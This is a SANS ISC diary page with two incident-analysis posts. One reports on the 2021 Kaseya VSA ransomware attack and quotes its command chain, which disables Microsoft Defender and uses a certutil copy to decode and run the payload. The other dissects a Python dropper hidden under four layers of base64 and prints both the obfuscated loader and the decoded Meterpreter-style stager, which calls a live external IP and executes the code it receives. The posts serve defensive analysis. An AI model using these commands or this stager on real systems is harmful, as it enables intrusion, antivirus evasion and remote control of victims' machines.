Threat Level: green Handler on Duty: Yee Ching Tok

SANS ISC: InfoSec Handlers Diary Blog InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Kaseya VSA Users Hit by Ransomware

Published: 2021-07-02
Last Updated: 2021-07-02 20:18:29 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

We are aware that some MSSP's customers (Managed Security Services Providers) have been hit by a ransomware. It seems that four(4) MSSP's have been affected until now. The ransomware was spread through the remote management solution "VSA"  provided by Kaseya[1]. This looks to be a brand new type of supply chain attack.

What we know so far? Kaseya requested all customers to shutdown their on-premises  servers (the cloud version is already down) because, once compromised, prevent access to the device.

The ransomware is dropped to  c:\kworking\agent.exe[2].

If you're a Kaseya's VSA user, please check as soon as possible with your representative to mitigate this attack. We will update this diary with more information when available.

[Update 1]

Some artiacts:

Suspicious directory: C:\kworking

AgentMon.exe 
-> cmd.exe /c ping 127.0.0.1 -n 6745 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe ??> powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

[1] https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689
[2] https://www.virustotal.com/gui/file/d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 comment(s)

"inception.py"... Multiple Base64 Encodings

Published: 2021-07-02
Last Updated: 2021-07-02 05:33:23 UTC
by Xavier Mertens (Version: 1)
4 comment(s)

"Inception" is a very nice SF movie in which, if you did not watch it, dreams are implemented in people's minds to help to get access to sensitive information from their memory. Then, a dream is implemented into another dream, etc... up to five levels[1]! If you are not paying attention to the movie, you can be quickly lost. 

Yesterday, I spotted an interesting malicious Python script. It has a very low VT score (3/58)[2] and is very small:

import base64;exec(base64.b64decode(bytes('aW1wb3J0IGJhc2U2NDtleGVjKGJhc2U2NC5iNjRkZWNvZGUoYnl0ZXMoJ2FXMXdiM0owSUdKaGMy
VTJORHRsZUdWaktHSmhjMlUyTkM1aU5qUmtaV052WkdVb1lubDBaWE1vSjFwWWFHeFplV2htV0RKc2RHTkhPWGxrUmpsbVMwTmthVmxZVG14T2Fs
RnVTMU0xYVU1cVVtdGFWMDUyV2tkVmIxZ3hPWEJpV0VKMlkyNVNabGg1WjI1Wk1qbHJXbGRPZWtwNWEzVmFNbFl3V2xjMWFtSXlVbXhqYVdkdVpG
aFNiVXhVWjI1TFUyZHVXVlpqZUdReVNYcFRha0pLVTBVMU1sZFVTakJpUjFKRVpVUmFhVkl5ZUhCVVJXUkxZVWROZVZaVVNrOVJNMmcyV2tWb1Mw
MVdhM3BWV0U1clVqSjRNRmRzUm5kaVYwbDZVMWRrYkZFd1NuZFpiV3hEWlZac1dFNVhOV0ZWTW1RMFZGVk9jazVyVG01aVJFSnFZbTF6TWxFeVpI
SlRiVTQyVFZod2FVMXJOWGxYYkdoU1pGZE5lVTlYY0doTmJGbDNVekJTU21NeVRYbFBWM0JvVFd4WmQxUkhlRTlWUmtWM1pFZGFWazFXU2xSVmJG
WkhWR3QwVW1Jd2NFUlhSVEV4VjFSSk5XUlhTblJXYlhCclVUSmtkbE51Y0ZabFZYaHhVbFJDVFdGclZUQlVSM0JHWlZVNVZGa3pUazVXUlZWNFZH
NXdhbU5GZEZKaU1IQkVWakJ3TlZkc1pFZGphMDV1WWtkNGJGSXdOWE5aTUdoU1RtdE9ibUV3Y0d0U01uZ3dWMnhOTVdWdFNraFdiWGhxVVRKamVG
TXhSbmRqTVVKWlZHcENhbUpzV25GYVJVMHhUVmRLZFZGdGFGcE5iazUyVTI1dk1WTnJjRFZsU0hCTlltdHdjMWRVVGxwaU1EVkVZVE5DV0dWclNt
dFJNakZTVDFkT05VNVliR0ZXTURSNVV6QmtNMk5GVG5WYVJ6bG9Wak5vYzFOVlpEUmlSMHB3WVVkMFRGWklhSHBVTW1SMlUyeHdSR042YkdwbFZG
WTFWMnhrVDAxcmRFaGtNMUpwVWpGYU1WTXdaRkpqUlhSU1kwZDRiRkl4V25GVE1HaDNZekpHV0ZOWVZtRlNNVnB4V1dwSmVHUXlUblJXYm5CcVpW
ZG9jRmRXYUU5aVJUVnhWVmhXV21Gc2EzZFhhMlJYWVcxSmVWVnRlRXhTTVVaM1V6Rk9ORTR3YjNwVVZ6VlFZbXMwTlZNeFJuWlFVMk53VjNwQ1pF
dFRhejBuTENkVlZFWXRPQ2NwS1M1a1pXTnZaR1VvS1NrPScsJ1VURi04JykpLmRlY29kZSgpKQ==','UTF-8')).decode())

When you see this, your reflex is to decode the Base64-encoded data. Probably a simple script, let's have a look at it:

remnux@remnux:/MalwareZoo/20210702$ base64dump.py inception.py
ID  Size    Encoded          Decoded          md5 decoded                     
--  ----    -------          -------          -----------                     
 1:       4 exec             {..              dfaf38dfe495302d62c3a9cefd4dc593
 2:    1384 aW1wb3J0IGJhc2U2 import base64;ex 953edd11c0c0f82534e750ebb8e4dad3
remnux@remnux:/MalwareZoo/20210702$ base64dump.py inception.py -s 2 -d
import base64;exec(base64.b64decode(bytes('aW1wb3J0IGJhc2U2NDtleGVjKGJhc2U2NC5iNjRkZWNvZGUoYnl0ZXMoJ1pYaGxZeWhmWDJsdGNH
OXlkRjlmS0NkaVlYTmxOalFuS1M1aU5qUmtaV052WkdVb1gxOXBiWEJ2Y25SZlh5Z25ZMjlrWldOekp5a3VaMlYwWlc1amIyUmxjaWduZFhSbUxU
Z25LU2duWVZjeGQySXpTakJKU0U1MldUSjBiR1JEZURaaVIyeHBURWRLYUdNeVZUSk9RM2g2WkVoS01Wa3pVWE5rUjJ4MFdsRndiV0l6U1dkbFEw
SndZbWxDZVZsWE5XNWFVMmQ0VFVOck5rTm5iREJqYm1zMlEyZHJTbU42TVhwaU1rNXlXbGhSZFdNeU9XcGhNbFl3UzBSSmMyTXlPV3BoTWxZd1RH
eE9VRkV3ZEdaVk1WSlRVbFZHVGt0UmIwcERXRTExV1RJNWRXSnRWbXBrUTJkdlNucFZlVXhxUlRCTWFrVTBUR3BGZVU5VFkzTk5WRVV4VG5wamNF
dFJiMHBEVjBwNVdsZEdja05uYkd4bFIwNXNZMGhSTmtObmEwcGtSMngwV2xNMWVtSkhWbXhqUTJjeFMxRndjMUJZVGpCamJsWnFaRU0xTVdKdVFt
aFpNbk52U25vMVNrcDVlSHBNYmtwc1dUTlpiMDVEYTNCWGVrSmtRMjFST1dONU5YbGFWMDR5UzBkM2NFTnVaRzloVjNoc1NVZDRiR0pwYUd0TFZI
aHpUMmR2U2xwRGN6bGplVFY1V2xkT01rdEhkM1JpUjFaMVMwZFJjRXRSY0d4bFIxWnFTMGh3YzJGWFNYVmFSMVpxWWpJeGQyTnRWbnBqZVdocFdW
aE9iRTVxVVhWWmFsa3dXa2RXYW1JeVVteExSMUZ3UzFONE4wb3pUVzVQYms0NVMxRnZQU2NwV3pCZEtTaz0nLCdVVEYtOCcpKS5kZWNvZGUoKSk=
','UTF-8')).decode())

Another Base64 chunk of data? Let's do it again. Finally, the payload was encoded four times! (Thanks to base64dump.py for working smoothly with pipes!)

remnux@remnux:/MalwareZoo/20210702$ base64dump.py inception.py -s 2 -d | \
base64dump.py -s 2 -d | \
base64dump.py -s 2 -d | \
base64dump.py -s 2 -d
import socket,zlib,base64,struct,time
for x in range(10):
    try:
        s=socket.socket(2,socket.SOCK_STREAM)
        s.connect(('52[.]14[.]18[.]129',11577))
        break
    except:
        time.sleep(5)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
    d+=s.recv(l-len(d))
exec(zlib.decompress(base64.b64decode(d)),{'s':s})

Basically, what we have is this:

remnux@remnux:/MalwareZoo/20210702$ echo "Hello" | base64 | base64 | base64 | base64 -d | base64 -d | base64 -d
Hello

The decoded script is a slightly modified Meterpreter backdoor and the IP address is alive. I connected to it in a sandbox and expected to get some payload but nothing...

Simple technique but it remains very effective to bypass antivirus solutions!

[1] https://visual.ly/community/Infographics/entertainment/5-levels-inception
[2] https://www.virustotal.com/gui/file/5bbde2e0191fac97ecceb6daf05780ae794966cfa0eeeeeda57541e33205a133/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

4 comment(s)
Diary Archives